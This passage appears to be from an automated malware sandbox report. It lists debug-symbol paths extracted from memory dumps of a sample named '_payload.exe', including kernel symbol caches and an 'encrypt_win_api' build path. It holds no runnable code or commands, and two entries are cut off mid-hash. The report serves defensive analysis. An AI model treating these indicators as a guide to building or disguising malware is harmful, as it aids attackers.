                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\on\X source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2274642389.00000000036C8000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2275873196.00000000036CA000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2233489520.00000000036AF000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2233363954.00000000036AC000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2255723793.00000000036C8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\s\_ source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2309862085.0000000003F03000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\\&z source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2292447274.0000000003BC8000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2294330417.0000000003BC8000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2285134073.0000000003BC5000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2294035823.0000000003BC8000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2282369419.0000000003BB9000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\a\ source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2315414414.0000000003EA3000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2322324444.0000000003EBB000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2320973138.0000000003EAA000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\a\5 source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2310523825.0000000003EB3000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ry\\ source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2315414414.0000000003EA3000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2322324444.0000000003EBB000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2320973138.0000000003EAA000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb.cdqw source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2232512939.0000000003C32000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2232315956.0000000003BA2000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\a\\ source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2273490567.0000000003C47000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2274386033.0000000003CA5000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2273727258.0000000003C73000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.1964607470.0000000003AD0000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2294187046.0000000003EE3000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2292702111.0000000003EE2000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\I source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2294187046.0000000003EE3000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2284499187.0000000003EE2000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2292702111.0000000003EE2000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\*ta\ source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2310523825.0000000003EB3000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\] source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2332585421.0000000004035000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2333358310.000000000407D000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2332101728.0000000003EB3000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2282440855.0000000003C7B000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2282081320.0000000003C58000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2292648224.0000000003C65000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2341825344.0000000003C86000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2273490567.0000000003C47000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2315115698.0000000003C5C000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2254663516.0000000003C5D000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2320687899.0000000003C5C000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2310618606.0000000003C56000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2313914869.0000000003C5C000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2332695677.0000000003C7B000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2292043905.0000000003C56000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2360091492.0000000003C8E000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2282440855.0000000003C7B000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2254323097.0000000003B39000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2255092558.0000000003B4C000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2273727258.0000000003C73000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2323157191.0000000003C87000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2316085239.0000000003C6D000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196da
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\\ source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2255239356.0000000003B10000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2232801684.0000000003B10000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2283227870.0000000003B8A000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2282602345.0000000003B34000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2274135225.0000000003B56000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2285187489.0000000003B94000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2325051592.000000000403C000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\r source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2315825658.00000000036E7000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2316766566.00000000036EC000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2295876636.00000000036EC000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2311135636.00000000036E7000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\]F source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2358481329.0000000003F52000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2341385936.0000000003F42000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2232512939.0000000003BC3000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2232315956.0000000003BA2000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\\9W source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2254323097.0000000003B39000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2255092558.0000000003B4C000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2255564557.0000000003B5C000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\/ source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2341959833.0000000003B24000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2348441168.0000000003B2B000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2342176452.0000000003B27000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\s source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2333405264.0000000003F5B000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2358481329.0000000003F52000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2341385936.0000000003F42000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdbache133408907975188232.txt source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2232512939.0000000003C32000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\y\ source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2292648224.0000000003C65000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2341825344.0000000003C86000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2273490567.0000000003C47000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2315115698.0000000003C5C000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2254663516.0000000003C5D000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2320687899.0000000003C5C000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2310618606.0000000003C56000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2313914869.0000000003C5C000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2332695677.0000000003C7B000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2292043905.0000000003C56000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2360091492.0000000003C8E000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2282440855.0000000003C7B000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2273727258.0000000003C73000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2323157191.0000000003C87000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2316085239.0000000003C6D000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2316719842.0000000003C79000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2310756662.0000000003C87000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2282081320.0000000003CE4000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\a\* source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2283589949.0000000003B1B000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2282602345.0000000003B14000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2283629174.0000000003B1F000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2285216220.0000000003B27000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb.cdqw' source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2232512939.0000000003C32000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2232512939.0000000003BC3000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2232315956.0000000003BA2000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2044311129.000000000369A000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2044529317.00000000036A0000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2315414414.0000000003EA3000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2315825658.00000000036E7000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2316766566.00000000036EC000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2310523825.0000000003EEC000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2311135636.00000000036E7000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2294187046.0000000003EE3000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2309862085.0000000003F03000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2292702111.0000000003EE2000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\\UWP4? source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2282081320.0000000003C58000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2333405264.0000000003F5B000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2358481329.0000000003F52000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2341385936.0000000003F42000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\w**s source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2273955613.00000000036E1000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2255008158.00000000036EE000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2274505062.00000000036FA000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2274054462.00000000036EE000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\e\e\ source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2323506783.0000000003F3B000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2323100107.0000000003F23000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2314739889.0000000003F03000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2322324444.0000000003EE2000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2319577426.0000000003ECB000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdbL source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2232512939.0000000003C32000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2232512939.0000000003C32000.00000004.00000020.00020000.00000000.sdmp
